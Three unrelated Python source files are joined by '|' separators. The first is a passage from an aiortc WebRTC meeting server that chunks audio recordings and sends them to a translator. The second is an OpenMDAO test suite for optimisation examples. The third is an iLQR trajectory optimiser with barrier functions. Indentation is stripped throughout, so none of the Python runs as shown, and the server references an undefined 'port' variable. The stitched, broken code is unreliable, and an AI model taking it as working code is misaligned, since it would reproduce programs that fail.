codec_name = "pcm_s16le"
# codec_name = "pcm_s16be"
# codec_name = "aac"
def __init__(self, track):
super().__init__()
self.track = track
self._init_container()
self.now = datetime.now()
def _init_container(self):
self.filename = os.path.join(ROOT, f"test{datetime.now()}.wav")
self.container = av.open(self.filename, mode="w")
self.stream = self.container.add_stream(self.codec_name)
logger.info(f"recording on track {self.track}")
def send_buffer_to_encoder(self):
# call_external_translator(self.filename)
# recording_buffer = open(self.filename, "rb").read()
ogg_buffer = convert_wav_to_ogg(open(self.filename, "rb")).read()
Thread(target=call_external_translator, args=(ogg_buffer, )).start()
logging.info(f"done, removing: {self.filename}")
os.unlink(self.filename)
# t.join()
async def encode_to_container(self, frame):
if self.container:
for packet in self.stream.encode(frame):
self.container.mux(packet)
diff = datetime.now() - self.now
if diff > timedelta(seconds=5):
self.container.close()
self.container = None
print("dumping")
self.send_buffer_to_encoder()
# print(self.buffer.getbuffer().nbytes)
self.now = datetime.now()
self._init_container()
async def recv(self):
frame = await self.track.recv()
# logger.info(f"Got a new frame!!!! {frame}")
try:
if USE_TRANSCRIBER:
await self.encode_to_container(frame)
except Exception as e:
logging.exception("Exception parsing frame")
return frame
async def index(request):
content = open(os.path.join(ROOT, "build", "index.html"), "r").read()
return web.Response(content_type="text/html", text=content)
async def listener(request):
params = await request.json()
offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
def log_info(msg, *args):
logger.info(pc_id + " " + msg, *args)
pc = RTCPeerConnection()
pc_id = "PeerConnection(%s)" % uuid.uuid4()
pcs.add(pc)
@pc.on("iceconnectionstatechange")
async def on_iceconnectionstatechange():
log_info("ICE connection state is %s", pc.iceConnectionState)
if pc.iceConnectionState == "failed":
await pc.close()
pcs.discard(pc)
for speaker, tracks in speakers.items():
log_info("adding speakers")
if speaker and speaker.iceConnectionState != "failed":
for track in tracks:
pc.addTrack(track)
@pc.on("track")
def on_track(track):
log_info("Track %s received", track.kind)
if track.kind == "audio":
pass
@track.on("ended")
async def on_ended():
log_info("Track %s ended", track.kind)
await pc.setRemoteDescription(offer)
# send answer
answer = await pc.createAnswer()
await pc.setLocalDescription(answer)
return web.Response(
content_type="application/json",
text=json.dumps(
{"sdp": pc.localDescription.sdp, "type": pc.localDescription.type}
),
)
async def offer(request):
params = await request.json()
offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
pc = RTCPeerConnection()
pc_id = "PeerConnection(%s)" % uuid.uuid4()
print(pc_id)
pcs.add(pc)
# pcs_to_tracks[pc] = []
# add_tracks_to_pcs()
def log_info(msg, *args):
logger.info(pc_id + " " + msg, *args)
log_info("Created for %s", request.remote)
# prepare local media
# player = MediaPlayer(os.path.join(ROOT, "demo-instruct.wav"))
recorder = MediaBlackhole()
@pc.on("datachannel")
def on_datachannel(channel):
@channel.on("message")
def on_message(message):
log_info(f"got message: {message}")
if isinstance(message, str) and message.startswith("ping"):
channel.send("pong" + message[4:])
@pc.on("iceconnectionstatechange")
async def on_iceconnectionstatechange():
log_info("ICE connection state is %s", pc.iceConnectionState)
if pc.iceConnectionState == "failed":
await pc.close()
pcs.discard(pc)
speaker_to_remove = speakers.get(pc)
if speaker_to_remove:
speakers.pop(pc, None)
@pc.on("negotiationneeded")
def on_negotiaion_needed():
log_info("negotiation needed")
@pc.on("track")
def on_track(track):
log_info("Track %s received", track.kind)
if pc not in speakers:
speakers[pc] = set()
if track.kind == "audio":
local_audio = AudioTransformTrack(track)
speakers[pc].add(local_audio)
recorder.addTrack(local_audio)
elif track.kind == "video":
speakers[pc].add(track)
pc.addTrack(track)
@track.on("ended")
async def on_ended():
log_info("Track %s ended", track.kind)
# handle offer
await pc.setRemoteDescription(offer)
await recorder.start()
# send answer
answer = await pc.createAnswer()
await pc.setLocalDescription(answer)
return web.Response(
content_type="application/json",
text=json.dumps(
{"sdp": pc.localDescription.sdp, "type": pc.localDescription.type}
),
)
async def on_shutdown(app):
# close peer connections
coros = [pc.close() for pc in pcs]
await asyncio.gather(*coros)
pcs.clear()
for ws in app['websockets']:
await ws.close(code=aiohttp.WSCloseCode.GOING_AWAY, message='Server shutdown')
class WebSocket(web.View):
async def get(self):
ws = web.WebSocketResponse()
await ws.prepare(self.request)
self.request.app['websockets'].add(ws)
def participant_list(meeting_name):
meeting = app['meetings'][meeting_name]
host = meeting['host']
return [{'username': participant, 'isHost': participant == host} for participant in meeting['participants']]
try:
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
data = json.loads(msg.data)
if data['type'] == 'create-meeting':
meeting_name = data['meetingName']
if meeting_name in app['meetings'].keys():
app['meetings'][meeting_name]['participants'].append(
data['username'])
app['meetings'][meeting_name]['host'] = data['username']
else:
app['meetings'][meeting_name] = {
'host': data['username'],
'participants': [data['username']],
}
msg = json.dumps(
{'type': 'participants-list', 'participants': participant_list(meeting_name)})
await ws.send_str(msg)
elif data['type'] == 'join-meeting':
meeting_name = data['meetingName']
if meeting_name in app['meetings'].keys():
app['meetings'][meeting_name]['participants'].append(
data['username'])
else:
app['meetings'][meeting_name] = {
'host': [data['username']],
'participants': [data['username']],
}
msg = json.dumps(
{'type': 'participants-list', 'participants': participant_list(meeting_name)})
for _ws in self.request.app['websockets']:
await _ws.send_str(msg)
elif data['type'] == 'send-message':
# Broadcast to everyone
data['type'] = "add-message"
msg = json.dumps(data)
for _ws in self.request.app['websockets']:
await _ws.send_str(msg)
elif msg.type == aiohttp.WSMsgType.ERROR:
pass
finally:
self.request.app['websockets'].discard(ws)
return ws
def add_cors_routes(routes, cors):
for route in routes:
cors.add(route, {
"*":
aiohttp_cors.ResourceOptions(
expose_headers="*",
allow_headers="*")
})
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="WebRTC audio / video"
)
# parser.add_argument("--cert-file", help="SSL certificate file (for HTTPS)")
# parser.add_argument("--key-file", help="SSL key file (for HTTPS)")
parser.add_argument(
"--host", default="0.0.0.0", help="Host for HTTP server (default: 0.0.0.0)"
)
# parser.add_argument(
# "--port", type=int, default=8080, help="Port for HTTP server (default: 8080)"
# )
parser.add_argument("--verbose", "-v", action="count")
args = parser.parse_args()
log_format = "%(asctime)s %(levelname)s %(message)s"
if args.verbose:
logging.basicConfig(format=log_format, level=logging.DEBUG)
else:
logging.basicConfig(format=log_format, level=logging.INFO)
app = web.Application()
app['websockets'] = weakref.WeakSet()
app['meetings'] = dict()
cors = aiohttp_cors.setup(app)
app.on_shutdown.append(on_shutdown)
static_route = app.router.add_static(
'/static/', path=STATIC_PATH, name='static')
app.router.add_get("/", index)
post_route = app.router.add_post("/offer", offer)
app.router.add_route('GET', '/ws', WebSocket)
listener_route = app.router.add_post("/listen", listener)
add_cors_routes([static_route, post_route, listener_route], cors)
web.run_app(
app, access_log=None, host=args.host, port=port
)
|
""" Test the examples directory to keep them in working order.
NOTE: If you make any changes to this file, you must make the corresponding
change to the example file.
"""
import unittest
from six.moves import cStringIO
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp, ExecComp, ScipyOptimizer, \
Newton, ScipyGMRES
from openmdao.test.util import assert_rel_error
from beam_tutorial import BeamTutorial
from fd_comp_example import Model as Model1
from fd_group_example import Model as Model2
from fd_model_example import Model as Model3
from implicit import SimpleImplicitComp
from implicit_ext_solve import SimpleImplicitComp as SIC2
from intersect_parabola_line import Balance, Parabola, Line
from krig_sin import TrigMM
from paraboloid_example import Paraboloid
from paraboloid_optimize_constrained import Paraboloid as ParaboloidOptCon
from paraboloid_optimize_unconstrained import Paraboloid as ParaboloidOptUnCon
from sellar_MDF_optimize import SellarDerivatives
from sellar_state_MDF_optimize import SellarStateConnection
class TestExamples(unittest.TestCase):
def test_paraboloid_example(self):
top = Problem()
root = top.root = Group()
root.add('p1', IndepVarComp('x', 3.0))
root.add('p2', IndepVarComp('y', -4.0))
root.add('p', Paraboloid())
root.connect('p1.x', 'p.x')
root.connect('p2.y', 'p.y')
top.setup(check=False)
top.run()
assert_rel_error(self, root.p.unknowns['f_xy'], -15.0, 1e-6)
def test_paraboloid_optimize_constrained(self):
top = Problem()
root = top.root = Group()
root.add('p1', IndepVarComp('x', 3.0))
root.add('p2', IndepVarComp('y', -4.0))
root.add('p', ParaboloidOptCon())
# Constraint Equation
root.add('con', ExecComp('c = x-y'))
root.connect('p1.x', 'p.x')
root.connect('p2.y', 'p.y')
root.connect('p.x', 'con.x')
root.connect('p.y', 'con.y')
top.driver = ScipyOptimizer()
top.driver.options['optimizer'] = 'SLSQP'
top.driver.options['disp'] = False
top.driver.add_desvar('p1.x', lower=-50, upper=50)
top.driver.add_desvar('p2.y', lower=-50, upper=50)
top.driver.add_objective('p.f_xy')
top.driver.add_constraint('con.c', lower=15.0)
top.setup(check=False)
top.run()
assert_rel_error(self, top['p.x'], 7.166667, 1e-6)
assert_rel_error(self, top['p.y'], -7.833333, 1e-6)
def test_paraboloid_optimize_unconstrained(self):
top = Problem()
root = top.root = Group()
root.add('p1', IndepVarComp('x', 3.0))
root.add('p2', IndepVarComp('y', -4.0))
root.add('p', ParaboloidOptUnCon())
root.connect('p1.x', 'p.x')
root.connect('p2.y', 'p.y')
top.driver = ScipyOptimizer()
top.driver.options['optimizer'] = 'SLSQP'
top.driver.options['disp'] = False
top.driver.add_desvar('p1.x', lower=-50, upper=50)
top.driver.add_desvar('p2.y', lower=-50, upper=50)
top.driver.add_objective('p.f_xy')
top.setup(check=False)
top.run()
assert_rel_error(self, top['p.x'], 6.666667, 1e-6)
assert_rel_error(self, top['p.y'], -7.333333, 1e-6)
def test_beam_tutorial(self):
top = Problem()
top.root = BeamTutorial()
top.driver = ScipyOptimizer()
top.driver.options['optimizer'] = 'SLSQP'
top.driver.options['tol'] = 1.0e-8
top.driver.options['maxiter'] = 10000 #maximum number of solver iterations
top.driver.options['disp'] = False
#room length and width bounds
top.driver.add_desvar('ivc_rlength.room_length', lower=5.0*12.0, upper=50.0*12.0) #domain: 1in <= length <= 50ft
top.driver.add_desvar('ivc_rwidth.room_width', lower=5.0*12.0, upper=30.0*12.0) #domain: 1in <= width <= 30ft
top.driver.add_objective('d_neg_area.neg_room_area') #minimize negative area (or maximize area)
top.driver.add_constraint('d_len_minus_wid.length_minus_width', lower=0.0) #room_length >= room_width
top.driver.add_constraint('d_deflection.deflection', lower=720.0) #deflection >= 720
top.driver.add_constraint('d_bending.bending_stress_ratio', upper=0.5) #bending < 0.5
top.driver.add_constraint('d_shear.shear_stress_ratio', upper=1.0/3.0) #shear < 1/3
top.setup(check=False)
top.run()
assert_rel_error(self, -top['d_neg_area.neg_room_area'], 51655.257618, .01)
assert_rel_error(self, top['ivc_rwidth.room_width'], 227.277956, .01)
assert_rel_error(self,top['ivc_rlength.room_length'], 227.277904, .01)
assert_rel_error(self,top['d_deflection.deflection'], 720, .01)
assert_rel_error(self,top['d_bending.bending_stress_ratio'], 0.148863, .001)
assert_rel_error(self,top['d_shear.shear_stress_ratio'], 0.007985, .0001)
def test_line_parabola_intersect(self):
from intersect_parabola_line import Line, Parabola, Balance
top = Problem()
root = top.root = Group()
root.add('line', Line())
root.add('parabola', Parabola())
root.add('bal', Balance())
root.connect('line.y', 'bal.y1')
root.connect('parabola.y', 'bal.y2')
root.connect('bal.x', 'line.x')
root.connect('bal.x', 'parabola.x')
root.nl_solver = Newton()
root.ln_solver = ScipyGMRES()
top.setup(check=False)
stream = cStringIO()
# Positive solution
top['bal.x'] = 7.0
root.list_states(stream)
top.run()
assert_rel_error(self, top['bal.x'], 1.430501, 1e-5)
assert_rel_error(self, top['line.y'], 1.138998, 1e-5)
# Negative solution
top['bal.x'] = -7.0
root.list_states(stream)
top.run()
assert_rel_error(self, top['bal.x'], -2.097168, 1e-5)
assert_rel_error(self, top['line.y'], 8.194335, 1e-5)
def test_sellar_MDF_optimize(self):
top = Problem()
top.root = SellarDerivatives()
top.driver = ScipyOptimizer()
top.driver.options['optimizer'] = 'SLSQP'
top.driver.options['tol'] = 1.0e-8
top.driver.options['disp'] = False
top.driver.add_desvar('z', lower=np.array([-10.0, 0.0]),
upper=np.array([10.0, 10.0]))
top.driver.add_desvar('x', lower=0.0, upper=10.0)
top.driver.add_objective('obj')
top.driver.add_constraint('con1', upper=0.0)
top.driver.add_constraint('con2', upper=0.0)
top.setup(check=False)
top.run()
assert_rel_error(self, top['z'][0], 1.977639, 1e-5)
assert_rel_error(self, top['z'][1], 0.0, 1e-5)
assert_rel_error(self, top['x'], 0.0, 1e-5)
assert_rel_error(self, top['obj'], 3.1833940, 1e-5)
def test_sellar_state_connection(self):
top = Problem()
top.root = SellarStateConnection()
top.driver = ScipyOptimizer()
top.driver.options['optimizer'] = 'SLSQP'
top.driver.options['tol'] = 1.0e-8
top.driver.options['disp'] = False
top.driver.add_desvar('z', lower=np.array([-10.0, 0.0]),
upper=np.array([10.0, 10.0]))
top.driver.add_desvar('x', lower=0.0, upper=10.0)
top.driver.add_objective('obj')
top.driver.add_constraint('con1', upper=0.0)
top.driver.add_constraint('con2', upper=0.0)
top.setup(check=False)
top.run()
assert_rel_error(self, top['z'][0], 1.977639, 1e-5)
assert_rel_error(self, top['z'][1], 0.0, 1e-5)
assert_rel_error(self, top['x'], 0.0, 1e-5)
assert_rel_error(self, top['obj'], 3.1833940, 1e-5)
def test_intersect_parabola_line(self):
top = Problem()
root = top.root = Group()
root.add('line', Line())
root.add('parabola', Parabola())
root.add('bal', Balance())
root.connect('line.y', 'bal.y1')
root.connect('parabola.y', 'bal.y2')
root.connect('bal.x', 'line.x')
root.connect('bal.x', 'parabola.x')
root.nl_solver = Newton()
root.ln_solver = ScipyGMRES()
top.setup(check=False)
# Positive solution
top['bal.x'] = 7.0
top.run()
assert_rel_error(self, top['bal.x'], 1.430501, 1e-5)
assert_rel_error(self, top['line.y'], 1.1389998, 1e-5)
# Negative solution
top['bal.x'] = -7.0
top.run()
assert_rel_error(self, top['bal.x'], -2.097168, 1e-5)
assert_rel_error(self, top['line.y'], 8.194335, 1e-5)
def test_implicit(self):
top = Problem()
root = top.root = Group()
root.add('comp', SimpleImplicitComp())
root.ln_solver = ScipyGMRES()
top.setup(check=False)
top.run()
assert_rel_error(self, top['comp.z'], 2.666667, 1e-5)
def test_implicit_ext_solve(self):
top = Problem()
root = top.root = Group()
root.add('p1', IndepVarComp('x', 0.5))
root.add('comp', SimpleImplicitComp())
root.add('comp2', ExecComp('zz = 2.0*z'))
root.connect('p1.x', 'comp.x')
root.connect('comp.z', 'comp2.z')
root.ln_solver = ScipyGMRES()
root.nl_solver = Newton()
top.setup(check=False)
top.run()
assert_rel_error(self, top['comp.z'], 2.666667, 1e-5)
def test_fd_comp_example(self):
top = Problem()
top.root = Model1()
top.setup(check=False)
top.root.comp1.print_output = False
top.root.comp2.print_output = False
top.root.comp3.print_output = False
top.root.comp4.print_output = False
top.run()
J = top.calc_gradient(['px.x'], ['comp4.y'])
assert_rel_error(self, J[0][0], 81.0, 1e-5)
def test_fd_group_example(self):
top = Problem()
top.root = Model2()
top.setup(check=False)
top.root.comp1.print_output = False
top.root.sub.comp2.print_output = False
top.root.sub.comp3.print_output = False
top.root.comp4.print_output = False
top.run()
J = top.calc_gradient(['px.x'], ['comp4.y'])
assert_rel_error(self, J[0][0], 81.0, 1e-5)
def test_fd_model_example(self):
top = Problem()
top.root = Model3()
top.setup(check=False)
top.root.comp1.print_output = False
top.root.comp2.print_output = False
top.root.comp3.print_output = False
top.root.comp4.print_output = False
top.run()
J = top.calc_gradient(['px.x'], ['comp4.y'])
assert_rel_error(self, J[0][0], 81.0, 1e-5)
def test_krig_sin(self):
prob = Problem()
prob.root = TrigMM()
prob.setup(check=False)
#traning data is just set manually. No connected input needed, since
# we're assuming the data is pre-existing
prob['sin_mm.train:x'] = np.linspace(0,10,20)
prob['sin_mm.train:f_x:float'] = np.sin(prob['sin_mm.train:x'])
prob['sin_mm.train:f_x:norm_dist'] = np.cos(prob['sin_mm.train:x'])
prob['sin_mm.x'] = 2.1 #prediction happens at this value
prob.run()
assert_rel_error(self, prob['sin_mm.f_x:float'], 0.8632, 1e-3)
assert_rel_error(self, prob['sin_mm.f_x:norm_dist'][0], -0.5048, 1e-3)
if __name__ == "__main__":
unittest.main()
|
from __future__ import print_function,division
from builtins import range
from six import iteritems
from ..spaces.objective import ObjectiveFunction
from ..spaces.sets import Set
from ..spaces.controlspace import ControlSpace
from ..spaces.configurationspace import ConfigurationSpace
import math
import numpy as np
class iLQR:
"""An implementation of the iLQR trajectory optimization algorithm.
This performs a conversion of obstacles into smooth barrier functions and
optimizes the objective function augmented with the barrier value.
Controls are projected onto the feasible control set at each step.
Attributes:
xref (array of size (T+1,n)): the optimized reference state trajectory
uref (array of size (T,m)): the optimized reference control trajectory
gains (pair of arrays): a pair (K,k) of arrays so that for each time step,
the optimized control is given by
u(x,t) ~= K[t]*(x - xref[t]) + k[t] + uref[t]
K has dimension (T,m,n) and k has dimension (T,m)
value (triple of T+1-lists): a triple (V,Vx,Vxx) of arrays so that for each
time step, the quadratic expansion of the value function is given by:
V(x,t) ~= 1/2 dx^T Vxx[t] dx + dx^T Vx[t] + V[t]
with dx = x-xref[t].
costGradients (array of size T,m): the gradients of total cost w.r.t.
controls.
"""
def __init__(self,controlSpace,objective,goalSet=None,clearanceToCostFn='square',clearanceToCostWeight=0.1):
assert isinstance(objective,ObjectiveFunction)
assert isinstance(goalSet,Set)
self.controlSpace = controlSpace
self.rawObjective = objective
self.cspace = controlSpace.configurationSpace()
self.goalSet = goalSet
print("iLQR Objective function",objective,"augmented with",clearanceToCostFn,"barrier")
if clearanceToCostFn is not None:
self.objective = BarrierAugmentedObjective(objective,controlSpace,self.goalSet,clearanceToCostFn,clearanceToCostWeight)
else:
self.objective = objective
self.clearanceToCostWeight = clearanceToCostWeight
self.adaptiveClearanceWeight = False
self.xref = None
self.uref = None
self.gains = None
self.value = None
self.costGradients = None
def run(self,x,u,maxIters,maxInnerIters=10,xtol=1e-7,gtol=1e-7,ftol=1e-7,damping=1e-5):
if len(u)==0:
raise ValueError("Cannot optimize with no controls")
if not isinstance(self.objective,BarrierAugmentedObjective):
maxInnerIters = 1
if not hasattr(x[0],'__iter__'):
#assume its a single state
x0 = x
x = [x0]
for ut in u:
x.append(self.controlSpace.nextState(x[-1],ut))
assert len(x) == len(u)+1
self.xref = np.array([xt for xt in x])
self.uref = np.array([ut for ut in u])
T = len(u)
m = len(u[0])
n = len(x[0])
self.gains = (np.zeros((T,m,n)),np.zeros((T,m)))
self.value = (np.zeros((T+1)),np.zeros((T+1,n)),np.zeros((T+1,n,n)))
self.costGradients = np.zeros((T,m))
if isinstance(self.objective,BarrierAugmentedObjective):
self.objective.setBarrierFromTrajectory(self.xref,self.uref)
feasible = self.objective.isFeasible()
if feasible:
print("iLQR: Starting from a feasible point with clearance for state",self.objective.barrierClearance,"control",self.objective.controlBarrierClearance,"goal",self.objective.goalBarrierClearance)
else:
print("iLQR: Starting from an infeasible point with clearance for state",self.objective.barrierClearance,"control",self.objective.controlBarrierClearance,"goal",self.objective.goalBarrierClearance)
else:
feasible = True
if not self.controlSpace.checkDerivatives(x[0],u[0]) or not self.controlSpace.checkDerivatives(x[-2],u[-1]):
input("Press enter to continue >")
if not self.objective.checkDerivatives(x[0],u[0]) or not self.objective.checkDerivatives(x[-2],u[-1]):
input("Press enter to continue >")
#first cost backup
costTraj = self.value[0]
costTraj[:] = self.evalCosts(self.xref,self.uref)
print("INITIAL TRAJECTORY")
for (a,b) in zip(x,u):
print(" ",a,b)
print(" ",x[-1])
print("COST TRAJECTORY",costTraj)
print("OBJECTIVE TYPE",self.objective.__class__.__name__)
J0 = costTraj[0]
if not math.isfinite(J0):
raise ValueError("Need to provide a feasible path as input?")
J0raw = self.rawObjective.cost(self.xref,self.uref)
print("INITIAL AUGMENTED COST",J0,"TRUE COST",J0raw)
for iter in range(maxIters):
alpha = 1.0
for inner in range(maxInnerIters):
self.backward()
g = self.costGradients
gnorm = np.linalg.norm(g)
if gnorm < gtol:
return True,'Convergence to stationary point'
knorm = np.linalg.norm(self.gains[1])
print("iLQR: Norm of nominal step size: %.3f, gradient norm %.3f"%(knorm,gnorm))
if np.dot(g.flatten(),self.gains[1].flatten()) > 0:
print("WARNING: LQR step has direction reverse from gradient")
self.gains[1][:] = -g
knorm = gnorm
#test gradient descent
#self.gains[1][:] = -g
#print(" Gains:",self.gains[1])
#print(" Gradients",g)
lineSearchIters = 0
alpha0 = alpha
while alpha*knorm > xtol and lineSearchIters < maxIters:
lineSearchIters += 1
xu = self.forward(alpha)
if xu is None:
#failure, shrink step size
alpha *= 0.5
continue
x,u = xu
Ja = self.evalCosts(x,u,cbranch=J0)
if Ja[0] < J0 and abs(Ja[0]-self.objective.cost(x,u)) > 1e-4:
print("Uh... difference in costs?",Ja[0],"vs",self.objective.cost(x,u))
input("Press enter to continue >")
if Ja[0] < J0:
#accept step
self.xref = x
self.uref = u
self.value[0][:] = Ja
print("iLQR: Step length %.3g reduced augmented cost to %.3f < %.3f"%(alpha,Ja[0],J0))
print(" standard cost changed from %.3f to %.3f"%(J0raw,self.rawObjective.cost(self.xref,self.uref)))
#print(" Endpoints",x[0],x[1])
#print(" Controls",u)
if alpha == alpha0:
#succeeded on first step, increase default step size
alpha *= 2.5
if alpha > 1.0:
alpha = 1.0
break
else:
#failure, shrink step size
#print("Rejected step to cost",Ja[0])
alpha *= 0.5
self.value[0][:] = Ja
J0 = Ja[0]
J0raw = self.rawObjective.cost(self.xref,self.uref)
if alpha*knorm <= xtol or lineSearchIters == maxIters:
print("iLQR: Inner iterations stalled at",lineSearchIters,"LS iters, step size",alpha,", gradient norm",knorm,"< tolerance",xtol)
break
print("iLQR: Outer iteration done, clearance for state",self.objective.barrierClearance,"control",self.objective.controlBarrierClearance,"goal",self.objective.goalBarrierClearance)
#next outer iteration
"""
if isinstance(self.objective,BarrierAugmentedObjective):
self.objective.barrierWeight *= 0.5
self.objective.controlBarrierWeight *= 0.5
self.objective.goalBarrierWeight *= 0.5
"""
if not isinstance(self.objective,BarrierAugmentedObjective) or max(self.objective.barrierWeight,self.objective.controlBarrierWeight,self.objective.goalBarrierWeight) < 1e-4:
print(" COST",self.rawObjective.cost(self.xref,self.uref))
return True,'Convergence on x'
else:
if isinstance(self.objective,BarrierAugmentedObjective):
self.objective.updateBarrierFromTrajectory(self.xref,self.uref)
Ja = self.evalCosts(self.xref,self.uref)
if self.objective.isFeasible() and abs(Ja[0]-J0) < ftol:
return True,'Convergence on f'
self.value[0][:] = Ja
J0 = Ja[0]
J0raw = self.rawObjective.cost(self.xref,self.uref)
print("AUGMENTED COST",Ja[0],"TRUE COST",J0raw,"FEASIBLE",feasible)
input()
print("iLQR: final clearance for state",self.objective.barrierClearance,"control",self.objective.controlBarrierClearance,"goal",self.objective.goalBarrierClearance)
return False,'Max iters reached'
def evalCosts(self,x,u,cbranch=float('inf')):
"""Returns vector of value function evaluated along trajectory."""
T = len(u)
assert T+1 == len(x)
costs = np.empty(len(x))
costs[-1] = self.objective.terminal(x[T])
if costs[-1] > cbranch:
costs[0] = costs[-1]
return costs
for i in range(T)[::-1]:
xt = x[i]
ut = u[i]
c = self.objective.incremental(xt,ut)
costs[i] = costs[i+1] + c
if costs[i] > cbranch:
costs[0] = costs[i]
return costs
return costs
def backward(self,damping=1e-3):
"""Computes the LQR backup centered around self.xref,self.uref.
Will fill out self.gains, self.costGradients, and the 2nd and 3rd
elements of self.value
"""
T = len(self.gains[0])
Vx = self.objective.terminal_gradient(self.xref[T])
Vxx = self.objective.terminal_hessian(self.xref[T])
if np.linalg.norm(Vxx-Vxx.T) > 1e-3:
print("ERROR IN TERMINAL HESSIAN",self.xref[T])
print(Vxx)
raise ValueError()
self.value[1][-1] = Vx
self.value[2][-1] = Vxx
print("iLQR BACKWARDS PASS")
#print(" Terminal cost",self.objective.terminal(self.xref[T]))
#print(" Terminal grad",Vx)
#print(" Terminal Hessian",Vxx)
for i in range(T)[::-1]:
#print("timestep",i)
xt,ut = self.xref[i],self.uref[i]
fx,fu = self.controlSpace.nextState_jacobian(xt,ut)
cx,cu = self.objective.incremental_gradient(xt,ut)
cxx,cxu,cuu = self.objective.incremental_hessian(xt,ut)
#print(" Next state jacobian x",fx)
#print(" Next state jacobian u",fu)
Qxx = fx.T.dot(Vxx.dot(fx))+cxx
Quu = fu.T.dot(Vxx.dot(fu))+cuu
Qxu = fx.T.dot(Vxx.dot(fu))+cxu
Vxc = Vx
Qx = cx + fx.T.dot(Vxc)
Qu = cu + fu.T.dot(Vxc)
if damping > 0:
Quu = (Quu + Quu.T)*0.5
Quu_evals, Quu_evecs = np.linalg.eig(Quu)
Quu_evals[Quu_evals < 0] = 0.0
Quu_evals += damping
QuuInv = np.dot(Quu_evecs,np.dot(np.diag(1.0/Quu_evals),Quu_evecs.T))
else:
QuuInv = np.linalg.pinv(Quu)
K = -QuuInv.dot(Qxu.T)
k = -QuuInv.dot(Qu)
temp = Qxu.dot(K)
Vxx = Qxx + temp + temp.T + K.T.dot(Quu.dot(K))
Vx = Qx + Qxu.dot(k) + K.T.dot(Qu+Quu.dot(k))
#print(" Vf grad",Vx)
#print(" Vf Hessian",Vxx)
self.gains[0][i] = K
self.gains[1][i] = k
self.value[1][i] = Vx
self.value[2][i] = Vxx
self.costGradients[i] = Qu
def forward(self,alpha=1.0):
"""Computes the iLQR forward pass, assuming the gain matrices have been computed"""
x = np.empty(self.xref.shape)
u = np.empty(self.uref.shape)
x[0] = self.xref[0]
u[0] = self.uref[0]
K,k = self.gains
for i in range(self.uref.shape[0]):
if i == 0:
du = k[0]
else:
du = k[i] + K[i].dot(x[i]-self.xref[i])
u[i] = self.uref[i] + alpha*du
"""
if not self.controlSpace.controlSet(x[i]).contains(u[i]):
try:
ui = self.controlSpace.controlSet(x[i]).project(list(u[i]))
if ui is None:
print("Projection of control failed?")
return None
u[i] = ui
except NotImplementedError:
#projection may not be implemented... TODO: address control constraints some other way
pass
"""
x[i+1] = self.controlSpace.nextState(x[i],u[i])
return (x,u)
class BarrierAugmentedObjective(ObjectiveFunction):
def __init__(self,base,controlSpace,goalSet,barrierType,barrierWeight):
"""Barrier types can be 'log', 'inv', 'square'.
Barrier function depends on distance(s) to constraints.
- 'log': -log(d) if d > 0, inf otherwise
- 'inv': 1/d if d > 0, inf otherwise
- 'square': 0 if d > 0, d^2 otherwise (soft constraint)
"""
self.base = base
if isinstance(controlSpace,ControlSpace):
self.controlSpace = controlSpace
self.cspace = controlSpace.configurationSpace()
else:
assert isinstance(controlSpace,ConfigurationSpace)
self.controlSpace = None
self.cspace = controlSpace
self.goalSet = goalSet
self.barrierType = barrierType
self.barrierWeight = barrierWeight
self.barrierClearance = 0.0
self.barrierShift = 0.0
self.controlBarrierWeight = barrierWeight
self.controlBarrierClearance = 0.0
self.controlBarrierShift = 0.0
self.goalBarrierWeight = barrierWeight
self.goalBarrierClearance = 0.0
self.goalBarrierShift = 0.0
def __str__(self):
return "Barrier-augmented "+str(self.base)+" barrier "+self.barrierType
def isHard(self):
return self.barrierType in ['inv','log']
def setBarrierFromTrajectory(self,x,u,scale=1.5,mindist=1e-5,firstTime=True):
"""Evaluates the trajectory clearance and sets the barrier
offset from a trajectory, ensuring that
- If the barrier is hard, x,u is feasible under the shifted barrier
- If x,u is invalid, then the max (unweighted) barrier cost evaluated
at x,u is equal to `scale`
`mindist` is used so that if the initial point is not strictly
feasible (or is very close to the boundary) then a positive slack is given
to the constraint.
"""
dmin = None
dumin = float('inf')
for xi,ui in zip(x,u):
d = self.cspace.clearance(xi)
if dmin is None:
dmin = np.asarray(d)
else:
dmin = np.minimum(dmin,d)
if self.controlSpace is not None:
U = self.controlSpace.controlSet(xi)
dumin = min(dumin,-U.signedDistance(ui))
self.barrierClearance = dmin
if self.controlSpace is None:
self.controlBarrierClearance = 0
else:
self.controlBarrierClearance = dumin
if self.goalSet is not None:
self.goalBarrierClearance = -self.goalSet.signedDistance(x[-1])
else:
self.goalBarrierClearance = 0.0
if self.isHard():
if not firstTime:
oldBarrierShift = self.barrierShift
oldControlBarrierShift = self.controlBarrierShift
oldGoalBarrierShift = self.goalBarrierShift
self.barrierShift = np.minimum(self.barrierClearance,0.0)
self.controlBarrierShift = min(self.controlBarrierClearance,0.0)
self.goalBarrierShift = min(self.goalBarrierClearance,0.0)
if self.barrierType == 'inv':
#scale = 1/(barrierClearance - barrierShift) => barrierClearance - 1/scale = barrierShift
self.barrierShift[self.barrierClearance < mindist] -= 1.0/scale
if self.controlBarrierClearance < mindist: self.controlBarrierShift -= 1.0/scale
if self.goalBarrierClearance < mindist: self.goalBarrierShift -= 1.0/scale
elif self.barrierType == 'log':
#scale = -log(barrierClearance - barrierShift) => barrierShift = barrierClearance - exp(-scale)
print(self.barrierClearance < mindist,self.barrierClearance,mindist)
self.barrierShift[self.barrierClearance < mindist] -= math.exp(-scale)
if self.controlBarrierClearance < mindist: self.controlBarrierShift -= math.exp(-scale)
if self.goalBarrierClearance < mindist: self.goalBarrierShift -= math.exp(-scale)
else:
raise ValueError("Invalid barrier string, only log, inv, and square are supported")
if not firstTime:
self.barrierShift = np.maximum(self.barrierShift,oldBarrierShift)
self.controlBarrierShift = max(self.controlBarrierShift,oldControlBarrierShift)
self.goalBarrierShift = max(self.goalBarrierShift,oldGoalBarrierShift)
print("Barrier clearances",self.barrierClearance,self.controlBarrierClearance,self.goalBarrierClearance)
print("Barrier shifts: state",self.barrierShift,"control",self.controlBarrierShift,"goal",self.goalBarrierShift)
print(" => Cost",self.cost(x,u))
input()
else:
self.barrierShift = 0.0
self.controlBarrierShift = 0.0
self.goalBarrierShift = 0.0
def isFeasible(self):
return all(v >= 0 for v in self.barrierClearance) and self.controlBarrierClearance >= 0 and self.goalBarrierClearance >= 0
